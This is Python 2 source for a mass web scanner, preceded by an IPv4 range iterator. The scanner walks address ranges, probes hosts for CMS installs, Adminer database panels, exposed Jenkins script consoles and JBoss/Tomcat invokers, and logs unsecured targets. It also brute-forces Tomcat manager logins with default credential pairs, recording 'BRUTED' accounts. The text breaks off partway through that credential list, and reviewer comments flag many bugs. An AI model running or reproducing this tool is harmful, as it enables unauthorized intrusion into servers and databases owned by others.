
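import re
import struct
import socket

# Anchored dotted-quad matcher: four octets, each 0-255 (leading zeros are
# accepted, as in the original pattern). Raw string so that "\." is a regex
# escape and not an invalid string escape (a SyntaxWarning on 3.12+).
IPV4PATTERN = re.compile(
    r'^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}'
    r'(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$'
)


class InvalidIPError(Exception):
    """Raised for a malformed IPv4 address or for a range whose start lies after its end."""
    pass


class IPV4Range:
    def __init__(self, start, end):
        '''
        Define an IPV4 Range from ``start`` to ``end`` (both inclusive).

        Raises InvalidIPError if either address is not a dotted quad, or if
        ``start`` is numerically greater than ``end``: a reversed range is
        rejected up front instead of walking past 255.255.255.255 and dying
        inside struct.pack.
        '''
        self.start = _validate_ip(start)
        self.end = _validate_ip(end)
        if _ip2long(self.start) > _ip2long(self.end):
            raise InvalidIPError('%s is after %s, range is empty.' % (self.start, self.end))
        self.current = None

    def next(self):
        '''
        Returns the next ip for this range, beginning with ``start``.
        Returns False once ``end`` has already been returned (False, not
        None, is kept so callers that test for it explicitly keep working).
        '''
        if self.current == self.end:
            return False
        if self.current is None:
            self.current = self.start
        else:
            self.current = _increase_ip(self.current)
        return self.current

    def __iter__(self):
        '''Yield the remaining addresses of the range by calling next().'''
        while True:
            addr = self.next()
            if addr is False:
                return
            yield addr

    @staticmethod
    def knock_on_port(addr, port, timeout=1):
        '''
        Tries to open a TCP connection to addr on the given port.
        Returns a tuple (status, error) where status is a boolean and
        error is the error string or None. A successful connection is
        closed before returning.
        '''
        try:
            conn = socket.create_connection((addr, port), timeout)
        except socket.error as e:
            return (False, str(e))
        conn.close()
        return (True, None)


def _validate_ip(addr):
    '''Return addr unchanged if it is a dotted-quad IPv4 address, else raise InvalidIPError.'''
    if not IPV4PATTERN.match(addr):
        raise InvalidIPError('%s is no valid IPv4 Addr.' % addr)
    return addr


def _increase_ip(addr):
    '''Calculate the next IP Addr (addr + 1, in network byte order).'''
    return _long2ip(_ip2long(addr) + 1)


def _ip2long(addr):
    '''Dotted quad -> unsigned 32-bit integer.'''
    return struct.unpack('!L', socket.inet_aton(addr))[0]


def _long2ip(value):
    '''Unsigned 32-bit integer -> dotted quad.'''
    return socket.inet_ntoa(struct.pack('!L', value))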
#!/usr/bin/python
#-*- coding:utf-8 -*-
# NOTE(review): Python 2 code (print statements, urllib2, `except A, B`
# further down); it does not run under Python 3 as written.
import inspect
import re
import urllib2
import threading
import sys
import ssl
import requests


class read_file_ip():
    """ Read a file line by line, remembering the line last returned. """

    def __init__(self, file):
        # NOTE(review): a failed open() is only printed; self.file then never
        # exists and next_line() depends on its AttributeError branch.
        try:
            self.file = open(file, "r+")
        except:
            print "[ERROR] Cant open File"
        # NOTE(review): this instance attribute has the same name as the
        # actual_line() method below and shadows it, so obj.actual_line()
        # raises TypeError (a str is not callable).
        self.actual_line = ""

    def next_line(self):
        """ Moves the pointer to the next line and returns it (right-stripped).
        Returns False at end of file or when the file was never opened. """
        try:
            line = self.file.next().rstrip()
        except StopIteration:
            line = False
        except AttributeError:
            line = False
        self.actual_line = line
        return line

    def actual_line(self):
        """ Returns the line last read without moving the pointer.
        Not reachable through an instance: see the attribute of the same name
        set in __init__. """
        return self.actual_line


class tools():
    """ Here you can store all functions which you want to use a few times """

    @staticmethod
    def logging(file, value):
        """ Append `value` plus CRLF to the file named `file`. """
        log_file = open(file, "a")
        log_file.write(value+"\r\n")
        log_file.close()

    @staticmethod
    def create_http_url(host, port, file = "/", prot = "http"):
        """ Create Url for Urllib2: "<prot>://<host>:<port><file>". """
        return "%s://%s:%s%s" %(prot, host, port, file)

    @staticmethod
    def http_get(ip, port, file = "", timeout = None, url = None, ssl = False):
        """ GET HTTP Status Code, html and url from url or ip + file.

        Returns [reachable, status_code, url, body]. An HTTPError counts as
        reachable and carries its code and body; URLError and socket timeout
        give [False, None, None, None].
        """
        # NOTE(review): the `ssl` parameter shadows the imported ssl module
        # inside this function.
        if url == None:
            if ssl == False:
                prot = "http"
            else:
                prot = "https"
            if port == None:
                port = 80
            # NOTE(review): `file` defaults to "" and is only compared with
            # None, so this check never fires; and raising a plain str is a
            # TypeError on Python 2.6+, not the intended error.
            if file == None:
                raise("ERR: func_http_get: no url or file specified")
            url = "%s://%s:%s%s" %(prot, ip, port, file)
        # NOTE(review): conf_timeout is assigned on scan instances in
        # scan.__init__, not on the class, so this lookup looks like it would
        # raise AttributeError -- confirm against the scan class.
        if timeout == None:
            timeout = scan.conf_timeout
        # NOTE(review): the computed timeout is never used; urlopen is called
        # with timeout=None (no limit). The response object is never closed.
        try:
            conn = urllib2.urlopen(url, timeout = None)
        except urllib2.HTTPError as e:
            return [True, e.code, url, e.read()]
        except urllib2.URLError as e:
            return [False, None, None, None]
        except urllib2.socket.timeout as e:
            return [False, None, None, None]
        # NOTE(review): urllib2 never raises requests' exceptions; this branch
        # is dead, and its return shape differs from the others.
        except requests.exceptions.SSLError as e:
            return e.message
        return [True, conn.code, url, conn.read()]

    @staticmethod
    def get_string_between(string, start, end):
        """ Return the text between the first `start` and the next `end` after
        it; False when either marker is missing. """
        # NOTE(review): the bare except also hides failures other than the
        # ValueError raised by str.index.
        try:
            end_of_string = string.index(start) + len(start)
            start_of_string = string.index(end, end_of_string)
            return string[end_of_string:start_of_string]
        except:
            return False

    @staticmethod
    def get_http_headers(url, timeout = None):
        """ Fetch `url` and return its response headers as a dict
        {name: value}; on failure return {"Error": exception-or-"Unknown"}. """
        main_url = url
        target_headers_dict = {}
        # NOTE(review): same scan.conf_timeout lookup as in http_get --
        # confirm it resolves at runtime.
        if timeout == None:
            timeout = scan.conf_timeout
        try:
            target_urllib = urllib2.urlopen(main_url, timeout = timeout)
        except urllib2.HTTPError as e:
            return {"Error" : e}
        except urllib2.URLError as e:
            return {"Error" : e}
        except urllib2.socket.timeout as e:
            return {"Error" : e}
        except:
            return {"Error" : "Unknown"}
        # Raw "Name: value" header lines. Only the first ": "-separated part
        # after the name is kept, so a value that itself contains ": " is
        # truncated; a line without ": " raises IndexError and is printed.
        target_headers = target_urllib.info().headers
        for i in target_headers:
            i = i.strip()
            items = i.split(": ")
            try:
                target_headers_dict[items[0]] = items[1]
            except IndexError:
                print items  # header line without ": " -- skipped
        return target_headers_dict

    # NOTE(review): the next three defs sit in the class without
    # @staticmethod and without a `self` parameter; called on an instance,
    # the instance is bound to `string`. No call site is visible in this
    # excerpt.
    def check_if_any_from_arr_in_string(string, whitelist = None, blacklist = None):
        """ Check if any item from array is in string. Allows black and whitelist. """
        # NOTE(review): `whitelist == []` / `blacklist == []` are comparisons,
        # not assignments, so a None list stays None and the loop / any()
        # below raise TypeError.
        if whitelist == None and blacklist == None:
            return False
        elif whitelist == None:
            whitelist == []
        elif blacklist == None:
            blacklist == []
        for i in blacklist:  # debug print of the blacklist, left in
            print i
        # NOTE(review): `any(k not in string ...)` is true as soon as one
        # blacklisted item is absent; "no blacklisted item present" would be
        # all(...).
        if any(k in string for k in whitelist) and any(k not in string for k in blacklist):
            return True
        else:
            return False

    def regex_not_match(string, regex):
        """ Returns True if regex does NOT match, false if it matches.
        Needed for check_if_any_reg_from_arr_in_string() """
        if re.match(regex, string) == None:
            return True
        else:
            return False

    def check_if_any_reg_from_arr_in_string(string, whitelist = None, blacklist = None):
        """ Checks if any regex from array is in string. Allows black and whitelist. """
        # NOTE(review): same no-op `== []` comparisons as in
        # check_if_any_from_arr_in_string. `regex_not_match` is a class-body
        # name, which is not visible from inside a method body, so that call
        # raises NameError when it is reached.
        if whitelist == None and blacklist == None:
            return False
        elif whitelist == None:
            whitelist == []
        elif blacklist == None:
            blacklist == []
        if any(re.match(k, string) for k in whitelist) and any(regex_not_match(string, k) for k in blacklist):
            return True
        else:
            return False

    @staticmethod
    def http_basic_auth(theurl, username, password):
        """ Fetch `theurl` with HTTP Basic credentials.

        Returns [True, body] on success or [False, HTTPError] when the server
        answers with an error status; other URLError failures propagate.
        """
        passman = urllib2.HTTPPasswordMgrWithDefaultRealm()  # this creates a password manager
        passman.add_password(None, theurl, username, password)
        # because we have put None at the start it will always
        # use this username/password combination for urls
        # for which `theurl` is a super-url
        authhandler = urllib2.HTTPBasicAuthHandler(passman)  # create the AuthHandler
        opener = urllib2.build_opener(authhandler)
        # NOTE(review): install_opener replaces the process-wide default
        # opener, so this handler and the credentials stored in passman stay
        # attached to every later urllib2.urlopen() call in the process
        # (http_get, get_http_headers, ...), not just to this request. Using
        # opener.open(theurl) instead would keep the handler local.
        urllib2.install_opener(opener)
        # All calls to urllib2.urlopen will now use our handler
        # Make sure not to include the protocol in with the URL, or
        # HTTPPasswordMgrWithDefaultRealm will be very confused.
        # You must (of course) use it when fetching the page though.
        try:
            pagehandle = urllib2.urlopen(theurl)
        except urllib2.HTTPError as e:
            return [False, e]
        # authentication is now handled automatically for us
        return [True, pagehandle.read()]


class scan():
    """ Class which does the Scanning Part. Here you can also add new scan modules.
""" def __init__(self, timeout): self.mod_scan_list = [] self.func_scan_modules() self.conf_timeout = int(timeout) def check(self, ip, port): print "Scanning ",ip, port for mod in self.mod_scan_list: #print mod eval("self.module_scan_%s(\"%s\", %s)" %(mod, ip, port)) print "Finished ",ip, port def func_scan_modules(self): all_funcs = inspect.getmembers(self, inspect.ismethod) for func in all_funcs: func_name = eval("self.%s" %(func[0])) func_args = inspect.getargspec(func_name) func_real_name_split = func[0].split("_") #print func_args if func_real_name_split[0] == "module": if func_real_name_split[1] == "scan": self.mod_scan_list.append(func_real_name_split[2]) print "[Module] Scan: %s" %(func_real_name_split[2]) def module_scan_drupal1(self, ip, port): ############################################################# # Scan for Drupal (all versions) and log them ############################################################# __info__ = {"name" : "drupal", "log_result_file" : "log_drupal1.txt", "log_unknwn_result_file" : "unknwn_results_drupal1.txt", "paths" : ["/Drupal", "/admin/build", "/blog", "/cms", "/community", "/content", "/core", "/developer", "/drupal", "/drupal/user/login?destination=admin", "/includes", "/logout", "/modules", "/page", "/shop", "/site", "/store", "/vendor", "/web", "/weblog", "/website", "/drupal/drupal6", "/drupal/drupal7", "/drupal/drupal8", "/modules/devel", "/sites/all/themes/adaptivetheme/at_admin", "/sites/all/modules/date/date_migrate/date_migrate_example", "/sites/all/modules/date", "/sites/all/modules/devel", "/sites/mysite/modules/contrib/views_bulk_operations", "/sites/mysite/modules/contrib/devel", "Cmsgarden\Cmsscanner\Detector\Module", "/modules/ctools"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: main_server_info = tools().get_http_headers(main_url+path) if main_server_info.get("Expires") == "Sun, 19 Nov 1978 05:00:00 GMT": 
tools().logging(__info__['log_result_file'], main_url+path+" Server:"+path+ " "+main_server_info.get("X-Generator")) def module_scan_drupal2(self, ip, port): ############################################################# # Scan for Drupal (all versions) and log them ############################################################# __info__ = {"name" : "drupal", "log_result_file" : "log_drupal2.txt", "log_unknwn_result_file" : "unknwn_results_drupal2.txt", "paths" : ["/Drupal", "/admin/build", "/blog", "/cms", "/community", "/content", "/core", "/developer", "/drupal", "/drupal/user/login?destination=admin", "/includes", "/logout", "/modules", "/page", "/shop", "/site", "/store", "/vendor", "/web", "/weblog", "/website", "/drupal/drupal6", "/drupal/drupal7", "/drupal/drupal8", "/modules/devel", "/sites/all/themes/adaptivetheme/at_admin", "/sites/all/modules/date/date_migrate/date_migrate_example", "/sites/all/modules/date", "/sites/all/modules/devel", "/sites/mysite/modules/contrib/views_bulk_operations", "/sites/mysite/modules/contrib/devel", "Cmsgarden\Cmsscanner\Detector\Module", "/modules/ctools"], "marks" : ["Drupal"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/user/login" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] Drupal:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_joomla1(self, ip, port): ############################################################# # Scan Hosts for installed Joomla and log them 
############################################################# __info__ = {"name" : "joomla", "log_result_file" : "log_joomla1.txt", "log_unknwn_result_file" : "unknwn_results_joomla1.txt", "paths" : ["/joomla", "/cms", "/Joomla", "/administrator/help/en-GB/toc.json", "/administrator/language/en-GB/install.xml", "/plugins/system/debug/debug.xml", "/administrator/", "/joomla/joomla1.5", "/joomla/joomla2.5", "/joomla/joomla3.5"], "marks" : ["Joomla!", "http://www.joomla.org", "for=\"modlgn_username\">"], "marks_1.0x" : ["<meta name=\"generator\" content=\"Joomla! - Copyright (C) 2005 - 2007 Open Source Matters.\" />"], "marks_1.5x" : ["<meta name=\"generator\" content=\"Joomla! 1.5 - Open Source Content Management\" />"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/administrator" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: if any(k in target_return[3] for k in __info__['marks']): joomla_version = "UNKNOWN" if any(k in target_return[3] for k in __info__['marks_1.0x']): joomla_version = "1.0.x" if any(k in target_return[3] for k in __info__['marks_1.5x']): joomla_version = "1.5.x" result_line = "%s Version: %s Server: %s" %(main_url+path ,joomla_version, main_server_info['Server']) print "[*] JOOMLA:", target_url, "Version:", joomla_version tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_adminer(self, ip, port): ############################################################# #Scan for log_adminer_DB_LogIn by [email protected]@R-LightS ############################################################# __info__ = {"name" : "adminer", "log_result_file" : "log_adminer.txt", "log_unknwn_result_file" : 
"unknwn_results_adminer.txt", "paths" : ["/_adminer.php", "/ad.php", "/adminer/index.php", "/adminer1.php", "/mirasvit_adminer_431.php", "/mirasvit_adminer-4.2.3.php", "/latest.php", "/adminer-4.7.0.php", "/wp-content/uploads/adminer.php", "/wp-content/plugins/adminer/inc/editor/index.php", "/wp-content/adminer.php", "/adminer/adminer-4.7.0.php", "/upload/adminer.php", "/uploads/adminer.php", "/adminer/adminer.php", "/adminer/adminer.php", "/mysql-adminer.php", "/wp-admin/adminer.php", "/wp-admin/mysql-adminer.php", "/adminer/", "/adminer-4.2.5-en.php", "/adminer-4.2.5-mysql.php", "/adminer-4.2.5.php", "/adminer-4.3.0-en.php", "/adminer-4.3.0-mysql.php", "/adminer-4.3.0.php", "/adminer-4.3.1-en.php", "/adminer-4.3.1-mysql.php", "/adminer-4.3.1.php", "/adminer-4.4.0-en.php", "/adminer-4.4.0-mysql.php", "/adminer-4.4.0.php", "/adminer-4.5.0-en.php", "/adminer-4.5.0-mysql.php", "/adminer-4.5.0.php", "/adminer-4.6.0-en.php", "/adminer-4.6.0-mysql.php", "/adminer-4.6.0.php", "/adminer-4.6.1-en.php", "/adminer-4.6.1-mysql.php", "/adminer-4.6.1.php", "/adminer-4.3.0-en.php", "/adminer-4.3.1-mysql.php", "/adminer-4.3.1.php", "/adminer.php"], "marks" : ["Adminer", "https://www.adminer.org/de/"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] Adminer:", target_url tools().logging(__info__['log_result_file'], target_url) else: tools().logging(__info__['log_unknwn_result_file'], target_url) def module_scan_opencart(self, ip, port): ############################################################# # Scan Hosts for OpenCart 
and add. paths to exploits ! # by ##[email protected]## , [email protected]@R-LightS and L1ne:1337 THxxx ############################################################# __info__ = {"name" : "OpenCart", "log_result_file" : "log_opencart.txt", "log_unknwn_result_file" : "unknwn_results_opencart.txt", "paths" : ["/admin/common/login.php", "/opencart/upload", "/system/startup.php", "/admin/index.php", "/admin/config.php", "/install/index.php", "/catalog/controller/payment/authorizenet_aim.php", "/info.php", "/admin/controller/common/login.php", "/admin/controller/extension/payment.php"], "marks" : ["OpenCart", "https://www.opencart.com", "OpenCart 1", "Powered By OpenCart", "Shopping cart", "shop", "Vivid Ads Shopping Cart", "ShopMaker v1.0", "Powered by CS-Cart - Shopping Cart Software", "OpenCart 2", "OpenCart 3", "powered by OpenCart"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] OpenChart:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_prestashop(self, ip, port): ############################################################# # Scan Hosts for installed Prestashop and log them by [email protected]@R-LightS ############################################################# __info__ = {"name" : "Prestashop", "log_result_file" : "log_prestashop.txt", "log_unknwn_result_file" : "unknwn_results_prestashop.txt", "paths" : ["/store/admin", "/administrator", "/myshopadminpanel", "/adminfolder123", "/admin"], 
"marks" : ["prestashop", "Prestashop 1.1", "Prestashop 1.2", "Prestashop 1.3", "Prestashop 1.4", "Prestashop 1.5", "Prestashop 1.6", "Prestashop 1.7", "Prestashop 1.8", "www.prestashop.com()", "Powered by Prestashop"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] Prestashop:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_wordpress(self, ip, port): ############################################################# # Scan Hosts for installed Wordpress and log them ############################################################# __info__ = {"name" : "wordpress", "log_result_file" : "log_wordpress.txt", "log_unknwn_result_file" : "unknwn_results_wordpress.txt", "paths" : ["/wordpress", "/wp", "/blog", "wp-login.php", "/wordpress/wp-login.php", "/Wordpress", "/Blog"], "marks" : ["wp-submit", "wp_attempt_focus()", "Powered by WordPress", "?action=lostpassword"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/wp-login.php" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] WordPress:", target_url 
tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_httpserver(self, ip, port): ############################################################# # Log HTTPServer Information such as used Serversoftware # and Version if possible and log them ############################################################# __info__ = {"name" : "httpserverinfo", "log_result_file" : "log_httpserver.txt"} target_url = tools().create_http_url(ip, port, file = "", prot = "http") headers = tools().get_http_headers(target_url) try: headers_server = headers['Server'] except KeyError, TypeError: headers_server = "Unknown" #print headers_server tools().logging(__info__['log_result_file'], target_url+" Server:"+headers_server) def module_scan_phpcgi(self, ip, port): ############################################################# # Scan Hosts for PHPCGI and log them ############################################################# __info__ = {"name" : "phpcgi", "log_usec_result_file" : "log_php_cgi.txt", "paths" : ["/cgi-bin/php", "/cgi-bin/php5"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: tools().logging(__info__['log_usec_result_file'], target_url) def module_scan_ejbinvoker(self, ip, port): ############################################################# update:29.01.21 # Scan Hosts for installed Jboss/Tomcat Servers Ports to scan: (8080,9111,9832) # having a EJBInvoker and log them ############################################################# __info__ = {"name" : "EJBInvokerServlet", "log_usec_result_file" : "usec_result_ejb.txt", "log_sec_result_file" : "sec_results_ejb.txt", "log_unknwn_result_file" : "unknwn_results_ejb.txt", "paths" : ["/status?full=true"], "marks" : 
["EJBInvokerServlet", "JMXInvokerServlet", "WWW-Authenticate: Basic realm=JBoss HTTP Invoker"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured # Check with k not in ... mark_fuzzed that the pma is not fucked up ;) if any(k in target_return[3] for k in __info__['marks']): print "[*] EJB (USEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) else: print "[*] EJB (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] EJB (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_jenkins(self, ip, port): #############################################################update:29.01.21 # Scan Hosts for installed Jenkins Server and log them Ports to scan: (80,82,84,100,443,515,1024,2002,2086,2121,2555,3428,3749,4444,4506, # 4840,5000,5432,5801,5858,7070,7777,8000,8066,8080,8081,8082,8086,8044, # 8087,8443,8500,9000,9002,9090,9095,9200,9595,9999,13579,55553,55554,60001) ############################################################# __info__ = {"name" : "jenkins", "log_usec_result_file" : "usec_result_jenkins.txt", "log_create_result_file" : "create_results_jenkins.txt", "log_sec_result_file" : "sec_results_jenkins.txt", "log_unknwn_result_file" : "unknwn_results_jenkins.txt", "paths" : ["/asynchPeople/", "/computer/", "/hudson/login", "/hudson/script", "/jenkins/login", "/jenkins/script", "/login", "/pview/", "/scripts" "/script", "/securityRealm/createAccount", "/signup", "/systemInfo", "/systeminf", "/manage" "/userContent/", "/view/All/builds", "/view/All/newjob"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url 
for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured if target_return[3].find("println(Jenkins.instance.pluginManager.plugins)") != -1: print "[*] Jenkins (UNSEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) print target_return[3] elif target_return[3].find("\">Create an account</a> if you are not a member yet.</div></div></td></tr>") != -1: #might create account print "[*] Jenkins (CREATE):",target_url tools().logging(__info__['log_create_result_file'], target_url) print target_return[3] elif target_return[3].find("<title>Jenkins</title>") != -1: print "[*] Jenkins (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) print target_return[3] else: tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] Jenkins (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_jmx1(self, ip, port): ############################################################# # Scan for Jboss/Tomcat servers having a admin panel and update:29.01.21 # brute for standard accounts and log them Ports to scan: (8081,8080,8090,8443,3541,8086,9080,) ############################################################# __info__ = {"name" : "jmx", "log_sec_result_file" : "log_jmx1_secured.txt", "log_usec_result_file" : "log_jmx1_unsecured.txt", "log_unknwn_result_file" : "unknwn_results_jmx1.txt", "log_bruted_result_file" : "log_jmx1_bruted.txt", "paths" : ["/jmx-console", "/admin-console/", "/EJBInvokerServlet", "/web-console/AOPBinding.jsp", "/web-console/Invoker", "/jadmin-console/", "/web-console/status", "/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" "/admin-console/", "/ROOT", "/add", "/balancer", "/dav", "/deploy", 
"/examples", "/examples/jsp/index.html", "/examples/jsp/snp/snoop.jsp", "/examples/jsp/source.jsp", "/examples/servlet/HelloWorldExample", "/examples/servlet/SnoopServlet", "/examples/servlet/TroubleShooter", "/examples/servlet/default/jsp/snp/snoop.jsp", "/examples/servlet/default/jsp/source.jsp", "/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample", "/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet", "/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp", "/examples/servlet/snoop", "/examples/servlets/index.html", "/examples/../manager/html", "/examples/%2e%2e/manager/html", "/examples/%252e%252e/manager/html", "/host-manager", "/host-manager/add", "/host-manager/host-manager.xml", "/host-manager/html/*", "/host-manager/list", "/host-manager/remove", "/host-manager/start", "/host-manager/stop", "/html/*", "/install", "/j4p", "/jmxproxy/*", "/jsp-examples", "/manager/list", "/manager/manager.xml", "/manager/reload", "/manager/remove", "/manager/resources", "/manager/roles", "/manager/save", "/manager/serverinfo", "/manager/sessions", "/manager/start", "/manager/status.xsd", "/manager/status/*", "/manager/stop", "/manager/undeploy", "/reload", "/remove", "/resources", "/roles", "/save", "/serverinfo", "/servlet/default/", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", 
"/servlet/org.apache.catalina.servlets.HTMLManagerServlet", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.ManagerServlet", "/servlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.WebdavServlet/", "/servlets-examples", "/sessions", "/start", "/status/*", "/stop", "/tomcat-docs", "/undeploy", "/webdav", "/webdav/index.html", "/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/", "/webdav/servlet/webdav/", "/invoker/JMXInvokerServlet" "/web-console/ServerInfo.jsp" "/invoker/", "/JMXInvokerServlet", "/jbossmq-httpil/", "/jbossws/services", "/jmx-console/HtmlAdaptor", "/web-console", "/manager/html", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], "mark_sec" : ["main Manager page", "&lt;role rolename=\"manager-gui\"/&gt;", "Manager App HOW-TO"], "mark_usec" : ["JBoss JMX Management Console", "x-powered-by jboss", "jboss http.favicon.hash:-656811182"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: #Might be unsecured if any(k in target_return[3] for k in __info__['mark_sec']): if tools().http_basic_auth(target_url, "tomcat", "tomcat")[0] == True: result_line += " Account: tomcat / tomcat" print "[*] JMX 
(BRUTED):",target_url, "Login: tomcat:tomcat" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "tomcat", "t0mcat")[0] == True: result_line += " Account: tomcat / t0mcat" print "[*] JMX (BRUTED):",target_url, "Login: tomcat:t0mcat" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "tomcat", "admin")[0] == True: result_line += " Account: tomcat / admin" print "[*] JMX (BRUTED):",target_url, "Login: tomcat:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "tomcat")[0] == True: result_line += " Account: admin / tomcat" print "[*] JMX (BRUTED):",target_url, "Login: admin:tomcat" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "admin")[0] == True: result_line += " Account: admin / admin" print "[*] JMX (BRUTED):",target_url, "Login: admin:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "manager")[0] == True: result_line += " Account: admin / manager" print "[*] JMX (BRUTED):",target_url, "Login: admin:manager" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "manager", "manager")[0] == True: result_line += " Account: manager / manager" print "[*] JMX (BRUTED):",target_url, "Login: manager:manager" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "manager", "admin")[0] == True: result_line += " Account: manager / admin" print "[*] JMX (BRUTED):",target_url, "Login: manager:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "root")[0] == True: result_line += " Account: admin / root" print "[*] JMX (BRUTED):",target_url, "Login: admin:root" 
